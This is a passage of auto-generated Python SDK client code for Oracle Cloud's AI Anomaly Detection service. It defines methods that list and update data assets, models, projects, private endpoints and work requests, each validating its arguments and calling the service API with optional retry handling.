This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.DataAssetCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/list_data_assets.py.html>`__ to see an example of how to use list_data_assets API.
"""
resource_path = "/dataAssets"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"project_id",
"display_name",
"limit",
"page",
"lifecycle_state",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_data_assets got unknown kwargs: {!r}".format(extra_kwargs))
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["ACTIVE", "DELETED"]
if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["timeCreated", "displayName"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"projectId": kwargs.get("project_id", missing),
"displayName": kwargs.get("display_name", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"lifecycleState": kwargs.get("lifecycle_state", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="DataAssetCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="DataAssetCollection")
def list_models(self, compartment_id, **kwargs):
"""
Returns a list of Models.
:param str compartment_id: (required)
The ID of the compartment in which to list resources.
:param str project_id: (optional)
The ID of the project for which to list the objects.
:param str lifecycle_state: (optional)
<b>Filter</b> results by the specified lifecycle state. Must be a valid
state for the resource type.
Allowed values are: "DELETING", "DELETED", "FAILED", "CREATING", "ACTIVE", "UPDATING"
:param str display_name: (optional)
A filter to return only resources that match the entire display name given.
:param int limit: (optional)
The maximum number of items to return.
:param str page: (optional)
The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call.
:param str sort_order: (optional)
The sort order to use, either 'asc' or 'desc'.
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field.
By default, when you sort by `timeCreated`, the results are shown
in descending order. When you sort by `displayName`, the results are
shown in ascending order. Sort order for the `displayName` field is case sensitive.
Allowed values are: "timeCreated", "displayName"
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.ModelCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/list_models.py.html>`__ to see an example of how to use list_models API.
"""
resource_path = "/models"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"project_id",
"lifecycle_state",
"display_name",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_models got unknown kwargs: {!r}".format(extra_kwargs))
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["DELETING", "DELETED", "FAILED", "CREATING", "ACTIVE", "UPDATING"]
if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["timeCreated", "displayName"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"projectId": kwargs.get("project_id", missing),
"lifecycleState": kwargs.get("lifecycle_state", missing),
"displayName": kwargs.get("display_name", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ModelCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ModelCollection")
def list_projects(self, compartment_id, **kwargs):
"""
Returns a list of Projects.
:param str compartment_id: (required)
The ID of the compartment in which to list resources.
:param str lifecycle_state: (optional)
<b>Filter</b> results by the specified lifecycle state. Must be a valid
state for the resource type.
Allowed values are: "ACTIVE", "CREATING", "FAILED", "DELETING", "DELETED", "UPDATING"
:param str display_name: (optional)
A filter to return only resources that match the entire display name given.
:param int limit: (optional)
The maximum number of items to return.
:param str page: (optional)
The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call.
:param str sort_order: (optional)
The sort order to use, either 'asc' or 'desc'.
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field.
By default, when you sort by `timeCreated`, the results are shown
in descending order. When you sort by `displayName`, the results are
shown in ascending order. Sort order for the `displayName` field is case sensitive.
Allowed values are: "timeCreated", "displayName"
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.ProjectCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/list_projects.py.html>`__ to see an example of how to use list_projects API.
"""
resource_path = "/projects"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"lifecycle_state",
"display_name",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_projects got unknown kwargs: {!r}".format(extra_kwargs))
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["ACTIVE", "CREATING", "FAILED", "DELETING", "DELETED", "UPDATING"]
if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["timeCreated", "displayName"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"lifecycleState": kwargs.get("lifecycle_state", missing),
"displayName": kwargs.get("display_name", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ProjectCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ProjectCollection")
def list_work_request_errors(self, work_request_id, **kwargs):
"""
Return a (paginated) list of errors for a given work request.
:param str work_request_id: (required)
The ID of the asynchronous request.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str page: (optional)
The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call.
:param int limit: (optional)
The maximum number of items to return.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.WorkRequestErrorCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/list_work_request_errors.py.html>`__ to see an example of how to use list_work_request_errors API.
"""
resource_path = "/workRequests/{workRequestId}/errors"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"page",
"limit"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_request_errors got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestErrorCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestErrorCollection")
def list_work_request_logs(self, work_request_id, **kwargs):
"""
Return a (paginated) list of logs for a given work request.
:param str work_request_id: (required)
The ID of the asynchronous request.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str page: (optional)
The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call.
:param int limit: (optional)
The maximum number of items to return.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.WorkRequestLogEntryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/list_work_request_logs.py.html>`__ to see an example of how to use list_work_request_logs API.
"""
resource_path = "/workRequests/{workRequestId}/logs"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"page",
"limit"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_request_logs got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestLogEntryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestLogEntryCollection")
def list_work_requests(self, compartment_id, **kwargs):
"""
Lists the work requests in a compartment.
:param str compartment_id: (required)
The ID of the compartment in which to list resources.
:param str work_request_id: (optional)
The ID of the asynchronous work request.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str page: (optional)
The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call.
:param int limit: (optional)
The maximum number of items to return.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.WorkRequestSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/list_work_requests.py.html>`__ to see an example of how to use list_work_requests API.
"""
resource_path = "/workRequests"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"work_request_id",
"opc_request_id",
"page",
"limit"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_requests got unknown kwargs: {!r}".format(extra_kwargs))
query_params = {
"compartmentId": compartment_id,
"workRequestId": kwargs.get("work_request_id", missing),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestSummaryCollection")
def update_ai_private_endpoint(self, ai_private_endpoint_id, update_ai_private_endpoint_details, **kwargs):
"""
Updates the private reverse connection endpoint.
:param str ai_private_endpoint_id: (required)
Unique private reverse connection identifier.
:param oci.ai_anomaly_detection.models.UpdateAiPrivateEndpointDetails update_ai_private_endpoint_details: (required)
The information to be updated in private reverse connection
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/update_ai_private_endpoint.py.html>`__ to see an example of how to use update_ai_private_endpoint API.
"""
resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_ai_private_endpoint got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"aiPrivateEndpointId": ai_private_endpoint_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_ai_private_endpoint_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_ai_private_endpoint_details)
def update_data_asset(self, data_asset_id, update_data_asset_details, **kwargs):
"""
Updates the DataAsset
:param str data_asset_id: (required)
The OCID of the Data Asset.
:param oci.ai_anomaly_detection.models.UpdateDataAssetDetails update_data_asset_details: (required)
The information to be updated.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.DataAsset`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/update_data_asset.py.html>`__ to see an example of how to use update_data_asset API.
"""
resource_path = "/dataAssets/{dataAssetId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"dataAssetId": data_asset_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_asset_details,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_asset_details,
response_type="DataAsset")
def update_model(self, model_id, update_model_details, **kwargs):
"""
Updates the Model
:param str model_id: (required)
The OCID of the Model.
:param oci.ai_anomaly_detection.models.UpdateModelDetails update_model_details: (required)
The information to be updated.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/update_model.py.html>`__ to see an example of how to use update_model API.
"""
resource_path = "/models/{modelId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_model got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"modelId": model_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_model_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_model_details)
def update_project(self, project_id, update_project_details, **kwargs):
"""
Updates the Project
:param str project_id: (required)
The OCID of the Project.
:param oci.ai_anomaly_detection.models.UpdateProjectDetails update_project_details: (required)
The information to be updated.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.Project`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/update_project.py.html>`__ to see an example of how to use update_project API.
"""
resource_path = "/projects/{projectId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"projectId": project_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
